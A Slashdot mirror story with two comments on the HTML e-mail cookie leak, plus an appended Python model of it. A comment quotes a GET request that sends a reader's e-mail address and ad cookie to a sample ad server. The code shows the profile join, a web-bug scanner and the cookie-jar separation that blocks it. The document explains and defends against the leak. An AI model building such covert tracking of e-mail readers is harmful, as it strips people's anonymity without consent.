Slashdot Mirror


Cookies are Security Hole in HTML Email

Richard Smith just keeps uncovering security holes. Today it's the Email Cookie Leak. By reading mail, you unknowingly register your email address in someone's database, and accept their cookie. Next time you browse their site, or a site they have banner ads or other GIFs on, you are essentially broadcasting your email address while you surf. As Smith points out, just wait until banner-ad companies start taking advantage of this. I repeat the suggestion I made in October: browsers (and all clients that speak HTTP) should reject cookies not sent with the page.

2 of 152 comments

  1. From the article by Money__ · Score: 4
    From the article:

    In Netscape Messenger, the GET request looks like:

    GET /sync.gif?email=john@doe.com HTTP/1.0
    Connection: Keep-Alive
    User-Agent: Mozilla/4.7 [en] (Win98; I)
    Host: www.mybannerads.com
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
    Accept-Encoding: gzip
    Accept-Language: en
    Accept-Charset: iso-8859-1,*,utf-8
    Cookie: id=c643640a

    Both the Email address and the cookie value are included in the Outlook and Messenger GET requests. When the GET request is processed by the MyBannerAds server, it first extracts the customer id number from the cookie and looks it up in its database of "anonymous" profiles of Web surfers. Once it has located the profile, it then extracts the Email address from the URL query string, turning a once "anonymous" profile into an "identified" profile.

    So where does MyBannerAds get the Email addresses in the first place to send out a message which includes the SYNC.GIF file? The answer is quite simple: they "rent" the Email addresses. Or more specifically, they rent space in junk Email messages that are already being sent out. The IMG tags typically take less than 100 bytes, so they can easily be embedded in messages that are part of any Email ad campaign that is using HTML Email messages.
    Another interesting discussion about HTML Email and cookies can be found @: http://www.tiac.net/users/smiths/privacy/wbfaq.htm

  2. HTML, not HTTP by Hrunting · Score: 5

    I'm glad we live in a world where Slashdot's YRO keeps us vigilant against the supposedly harmful effects of Internet society. I mean, if you think about it, there are many more Internet technologies that can, when used improperly, cause security violations on your system.

    In this case, browsers simply need to be set up to function as individual components. The web browser should not have access to the same mechanisms as an e-mail client. HTML e-mail is different from loading a web page and should be treated as such. Cookies are not a part of HTML; they are a part of HTTP! The browsers shouldn't confuse the two. This isn't a problem with the implementation of cookies, this is a problem with the implementation of HTML e-mail and the web browser.

    And the idea that loading cookies from only that page is ludicrous. The whole idea is to be able to give an entire site access to information so that you can do things on different pages with similar information without having to repeatedly ask for that information. There's nothing in the HTTP specification that makes this harmful. Someone simply didn't implement the specification properly so now clients can share cookie files, leading to a possible hidden exchange of data between them.
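The mechanism quoted in the first comment (the ad server joining the cookie id from the Cookie header to the e-mail address in the query string) and the separation Hrunting argues for in the second (a mail client that does not consult the browser's cookie jar) as one added example in Python. This is not code from the story, from Richard Smith's write-up or from either commenter. The host www.mybannerads.com, the sync.gif path and the cookie id c643640a are taken from the quoted request; the profile table, the HTML message and the cookie jars are constructed here for illustration.

```python
# Model of the HTML e-mail cookie leak: the ad server's join, a scanner for
# the IMG web bug inside a message, and the cookie-jar separation that stops
# the leak.  All inputs below are constructed for this example.
from html.parser import HTMLParser
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Host, path and cookie id follow the request quoted in the first comment.
SYNC_URL = "http://www.mybannerads.com/sync.gif?email=john@doe.com"
REQUEST = (
    "GET /sync.gif?email=john@doe.com HTTP/1.0\r\n"
    "Host: www.mybannerads.com\r\n"
    "Cookie: id=c643640a\r\n"
    "\r\n"
)
# Constructed HTML mail: a cid: logo, the 1x1 web bug, and a plain banner.
MESSAGE = """<html><body>
<p>Big sale this week!</p>
<img src="cid:logo@mailer" width="80">
<img src="http://www.mybannerads.com/sync.gif?email=john@doe.com" width="1" height="1">
<img src="http://images.example/banner.gif">
</body></html>"""
# Cookie jar as the browser holds it: host -> {name: value}.
BROWSER_JAR = {"www.mybannerads.com": {"id": "c643640a"}}


def sample_profiles():
    """Fresh copy of the ad server's "anonymous" profiles, keyed by cookie id."""
    return {"c643640a": {"email": None, "sites": ["news.example", "shop.example"]}}


def parse_request(raw):
    """Split a raw HTTP/1.0 request into (path, query dict, cookie dict)."""
    lines = raw.splitlines()
    _method, target, _version = lines[0].split()
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                      # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    jar = SimpleCookie()
    if "cookie" in headers:
        jar.load(headers["cookie"])
    return parts.path, parse_qs(parts.query), {k: m.value for k, m in jar.items()}


def identify_profile(raw, profiles):
    """The ad server's join: look up the cookie id, then attach the e-mail
    address from the query string.  Returns (cookie id, profile or None)."""
    _path, query, cookies = parse_request(raw)
    cid = cookies.get("id")
    email = query.get("email", [None])[0]
    if cid in profiles and email:
        profiles[cid]["email"] = email     # anonymous profile is now identified
        return cid, profiles[cid]
    return cid, None


class _ImgSrcs(HTMLParser):
    """Collect every <img src=...> in a message body."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            self.srcs += [v for n, v in attrs if n.lower() == "src" and v]


def find_web_bugs(html, recipient):
    """Remote images whose query string carries the recipient's address."""
    p = _ImgSrcs()
    p.feed(html)
    hits = []
    for src in p.srcs:
        u = urlsplit(src)
        if u.scheme not in ("http", "https"):
            continue                   # cid:/data: images cannot phone home
        values = [v for vals in parse_qs(u.query).values() for v in vals]
        if any(recipient.lower() in v.lower() for v in values):
            hits.append(src)
    return hits


def build_image_request(src, jar):
    """The GET a mail client sends for an image, given the cookie jar it may
    consult.  The browser's jar reproduces the leak; an empty mail-only jar
    sends no Cookie header, so the server has nothing to join on."""
    u = urlsplit(src)
    target = u.path + ("?" + u.query if u.query else "")
    lines = [f"GET {target} HTTP/1.0", f"Host: {u.hostname}"]
    cookies = jar.get(u.hostname, {})
    if cookies:
        lines.append("Cookie: " + "; ".join(f"{k}={v}" for k, v in cookies.items()))
    return "\r\n".join(lines) + "\r\n\r\n"


if __name__ == "__main__":
    print("web bugs:", find_web_bugs(MESSAGE, "john@doe.com"))
    for name, jar in (("shared jar", BROWSER_JAR), ("mail-only jar", {})):
        print(name, "->", identify_profile(build_image_request(SYNC_URL, jar), sample_profiles()))
```

With the shared jar the request that build_image_request emits is the same one the first comment quotes, and identify_profile turns the anonymous c643640a profile into an identified one; with an empty mail-only jar the same image fetch carries no Cookie header and the server is left with an e-mail address it cannot tie to any browsing profile. Not fetching remote images from mail at all removes the e-mail half of the join as well.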